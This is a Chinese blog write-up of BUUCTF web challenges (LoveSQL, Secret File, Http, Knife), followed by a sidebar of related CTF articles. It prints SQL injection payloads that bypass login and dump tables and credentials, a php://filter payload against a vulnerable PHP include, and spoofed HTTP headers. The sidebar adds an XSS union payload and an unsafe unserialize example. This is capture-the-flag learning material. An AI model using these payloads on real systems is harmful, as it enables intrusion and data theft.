buuctf web 第一页 第9题到第12题

最新推荐文章于 2025-06-12 14:05:54 发布
最新推荐文章于 2025-06-12 14:05:54 发布
阅读量351 收藏 2
点赞数 11
分类专栏: BUUctf web 文章标签: web安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_81040377/article/details/140643623
版权

[极客大挑战 2019]LoveSQL

一个万能密码秒了

1'or 1=1#

在这里插入图片描述
然后登录进去没flag
爆吧
一个简单的联合注入,没有过滤的

1'union select 1,2,3#
1'union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=database()),3#
geekuser,l0ve1ysq1!

1'union select 1,(select group_concat(column_name)from information_schema.columns where table_name='l0ve1ysq1'),3#
Hello id,username,password!

1'union select 1,(select group_concat(username,password)from l0ve1ysq1),3#

奇怪的是他把反引号给办了,我无语,反引号还用来绕过引号呢

[极客大挑战 2019]Secret File

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
啥都没看到
退回去抓包
在这里插入图片描述

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

方法很多

php://filter/read=convert.base64-encode/resource=flag.php

[极客大挑战 2019]Http

进地址就翻了跟头,我加了http结果不行,试了几次之后直接来成功了
在这里插入图片描述
没啥好说的

GET /Secret.php HTTP/1.1
Host: node5.buuoj.cn:26513
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36;Syclover
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
x-forwarded-for: 127.0.0.1
referer: https://Sycsecret.buuoj.cn
Connection: close

[极客大挑战 2019]Knife

在这里插入图片描述
不能直接RCE那么用antsword来进行操作

BUUCTF web第一页WP
东隅的博客
05-13 884
目录 [极客大挑战 2019]EasySQL [HCTF 2018]WarmUp [极客大挑战 2019]Havefun [ACTF2020 新生赛]Include [强网杯 2019]随便注 [极客大挑战 2019]EasySQL payload: 1' or 1=1-- - 1 flag{deb9ccf8-479a-49c9-8412-6171f1c4b057} [HCTF 2018]WarmUp f12查看源码发现提示source.php, 进入获得源代码 .
buuctf web第二代码审计
qq_44740774的博客
09-25 899
buuctf web第二代码审计
BUUCTF WEB 第四页WP(持续更新)
东隅的博客
10-13 5725
这个感觉啥也没有,翻了半天,才找到有个传参的地方,第一个参数叫search,就是查询,这后面跟的地名,自己感觉有问,但是不看别的师傅的博客,我可能也不会往sql注入这方面来想,自己还是太菜了。那搜索的地方变成用户为2的时候了,我没有注册用户为2的号,所以他这里不回显,我甚至觉得这个漏洞可以搜到别人的简介,那这里首先可以考虑联合查询注入。他的逻辑是文件内容前五位不检测,后面的会进行严格的过滤,合格的就变成可执行php,不合格的就die掉。//,则}闭合了a(),同时//注释了后面的内容。
BUUCTF Web 第一页全部Write ups
yym68686
03-26 2339
更多笔记,可以关注yym68686.top 目录[极客大挑战 2019]Http[ACTF2020 新生赛]Exec[极客大挑战 2019]Secret File[HCTF 2018]WarmUpReferences[极客大挑战 2019]EasySQLReferences[强网杯 2019]随便注方法一方法二References[极客大挑战 2019]Havefun[SUCTF 2019]EasySQL方法一方法二References[ACTF2020 新生赛]IncludeReferences[极客大挑
BUUCTF web第三页WP
东隅的博客
10-03 1441
简单来说,就是mt_srand(seed)分发种子,相当于进行产生随机数的初始化,然后通过mt_rand函数获得种子,但是这个随机数并不是真正的随机,他是有可预测性的,如果我们能获得种子,就一定程度上可以获得产生的随机数,根据这个随机数进行验证的部分就不安全了。这个的逻辑就是在注册的地方进行过滤,我们绕过过滤登陆进去以后,有一个改密码的功能,他是用双引号闭合用户名进行改密码操作的,我们注册好的用户名双引号结尾就可以闭合,后面跟我们进行报错注入的代码就好,至于改密码怎么改是随便填的,重点在注册好的用户名。
BUUCTF Web 第二页全部Write ups
yym68686
07-09 2148
目录[强网杯 2019]高明的黑客[BUUCTF 2018]Online Tool[RoarCTF 2019]Easy Java[GXYCTF2019]BabyUpload[GXYCTF2019]禁止套娃方法一方法二方法三[BJDCTF2020]The mystery of ip[GWCTF 2019]我有一个数据库[BJDCTF2020]Mark loves cat[BJDCTF2020]ZJCTF,不过如此[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[De1CTF 201
buuctf(web)部分实操和知识点
Z11762的博客
04-18 1033
这里跟前面做过的一个看后端源码的很相似,就是:PHP的文件包含函数有一个「特性」,被包含的文件内容中,如果是「代码」则会执行,而不会在页面中展示;针对这一特性,我们可以使用PHP伪协议对文件内容进行「编码」,编码后的文件内容由于不能被执行,会展示在页面中,而后再将页面中的内容复制到本地进行「解码」,即可查看文件内容,拿到 flag。"https://Sycsecret.buuoj.cn" 是一个URL,指向一个名为 "Sycsecret.buuoj.cn" 的网站或资源。之后界面显示“No!
[CTF夺旗赛] BUUCTF N1BOOK 第一章 web入门
Da1NtY的博客
08-20 1291
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。BUUCTF是一个很好的CTF训练平台,这里介绍的是N1BOOK部分的第一章,后续会陆续更新。
BUUCTFWeb 解析(一)
Flag少侠的博客
05-03 2947
[极客大挑战 2019] EasySQL、[极客大挑战 2019] Havefun、[HCTF 2018] WarmUp、[ACTF2020 新生赛] Include、[ACTF2020 新生赛] Exec、[GXYCTF2019] Ping Ping Ping、[SUCTF 2019] EasySQL、[强网杯 2019] 随便注
Buuctf Web
weixin_68029979的博客
04-24 2018
写在前面, 本人小白一枚,记录一下web过程,大部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web,所以有些会没有思路,这时会参考其他大佬的解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在解中,可能并没有说清除为什么是这样,什么要这样,其实大部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有目没有解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
BUUCTF Web1
ookami6497的博客
12-11 989
BUUCTF-Web解(持续更新中)
2301_80281749的博客
11-25 2358
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
【网络安全】SRC漏洞挖掘思路/手法分享
等风来
06-03 655
本文总结了多个实用的渗透测试技巧,涵盖接口安全、权限管理、数据泄露等多个方面。主要包括:主机URL复制差异、GET请求并发实现、密码明文获取方法、文件上传黑名单绕过、优惠券逻辑漏洞测试、用户信息越权访问、多重参数修改越权、复杂ID收集技巧、参数删除实现越权、权限管理参数空值测试、Cookie参数越权、Host头修改越权、并发测试场景、HTTP方法滥用、前端限制绕过、分隔符注入攻击、脏数据绕过频率限制、数组参数篡改以及邀请权限提升漏洞等
《网络安全与防护》知识点复习
2301_79870359的博客
06-12 757
《网络安全与防护》知识点复习
秋招Day12 - 计算机网络 - 网络安全
weixin_54857540的博客
06-04 777
跨站请求伪造,挟持用户在当前已登陆的Web应用程序上执行非本意的操作。如何避免?检查请求头中规定Referer字段,Referer字段记录了HTTP请求的来源地址。在HTTP的请求参数中加入一个服务器随机生成的token,并在服务器端建立一个拦截器验证这个token,如果请求中没有token或者token内容不正确,就可能是CSRF攻击敏感操作多重校验,比如邮箱确认、验证码DoS就是Denial of Service,意思是拒绝服务。
网络安全之防病毒系统
anquan2233的博客
06-11 283
只要是继承了MyController都需要session但是后面有几个不需要鉴权的Controller除了MyController还有一个ApiController,此控制器下都是不需要鉴权的问点用户注册来看用户相关的控制器UserController,前面的几个方法开头都需要获取session中的username或者eid,这些都不是我们可以利用的点往后看找到regUserAction方法,直接从request中获取了我们传入的参数进行解密。
RED DA认证-EN18031网络安全常见问以及解答
最新发布
2501_90322522的博客
06-12 533
A:在安全通信中,一般包括应用层基于TLS的加密,该部分涉及端侧和云侧,通讯模组厂家无法明确客户项目具体的加密协议、加密版本等技术细节,因此无法支持填写。A:通讯模组厂家仅能够提供模组的漏洞报告,无法提供客户产品漏洞报告,如客户未引入新的开源组件,则漏洞报告可以复用。A:威胁建模需要详细了解客户产品形态、工作逻辑/原理、接口、数据跨域交换以及工程措施,通讯模组厂家对客户产品掌握情况无法支持客户进行威胁建模,且通讯模组厂家的威胁建模客户也无法复用。A:仅直接出货至欧盟的设备需要RED DA认证。
Bugku-CTF-Web安全最佳刷路线
ailx10
06-07 843
《CTF刷路线:Web安全从入门到进阶》 摘要:本文为网络安全爱好者提供Bugku-CTF平台Web安全方向的系统性刷路线。按照难度系数划分为5个等级,涵盖基础到高阶的Web安全知识点。从简单的查看源代码、绕过前端限制等基础操作(难度1),到SQL注入、文件包含(难度3),再到XSS、反序列化等高级漏洞利用(难度4-5)。每道目都标注了核心考察点,如Burp使用、PHP伪协议、Flask模板注入等,帮助学习者循序渐进掌握Web安全攻防技能。作者ailx10作为网络安全领域优秀答主,分享其整理的实战刷
零基础在实践中学习网络安全-皮卡丘靶场(第十一期-目录遍历模块)
2404_89737060的博客
06-06 607
最适和新手学习的皮卡丘靶场教学
BUUCTFweb
02-21
### BUUCTF Web目解思路和技巧 #### SQL注入漏洞检测与利用 对于SQL注入类型的挑战,在确认存在注入点之后,可以采用多种技术手段来进一步探索数据库结构并提取敏感信息。例如,在某些情况下,堆叠查询允许攻击者在同一请求中执行多个SQL语句[^5]。 ```sql 1&#39; UNION ALL SELECT NULL,&#39;<script>alert(1)</script>&#39;,NULL,NULL FROM information_schema.tables -- ``` 这段代码展示了如何通过联合查询的方式向目标应用发送恶意输入,从而可能触发跨站脚本(XSS)攻击或泄露其他有用的数据。 #### 文件包含漏洞的识别与利用 当遇到文件包含功能时,了解PHP处理这些请求的行为至关重要。如果应用程序使用了`include()` 或 `require()` 函数加载外部文件,则可能存在风险。特别是当用户能够控制传递给此类函数的参数时,就有可能导致远程文件包含(RFI)或本地文件包含(LFI)[^4]。 为了绕过限制访问特定文件路径的安全措施,可以尝试利用PHP伪协议(`php://filter`)对文件内容进行转换: ```bash http://example.com/vuln.php?page=php://filter/convert.base64-encode/resource=config.inc.php ``` 此命令将把配置文件的内容编码成Base64格式返回给客户端浏览器,使得即使服务器试图阻止直接读取该文件也成为可能。 #### 序列化与反序列化的安全考量 在涉及对象操作的应用程序环境中,应当特别注意防止不信任来源提供的数据被用来创建实例。这是因为一旦成功实现了不受控的对象初始化过程,便能轻易地操纵内部状态甚至调用任意方法。因此,务必验证所有来自用户的输入,并采取适当的方法对其进行清理以确保安全性[^2]。 考虑下面这个简单的例子,它演示了一个潜在危险场景下不当使用的后果: ```php <?php class User { public $name; function __destruct() { echo "User name is {$this->name}"; } } // 不要这样做!容易受到攻击者的操控。 unserialize($_GET[&#39;data&#39;]); ?> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值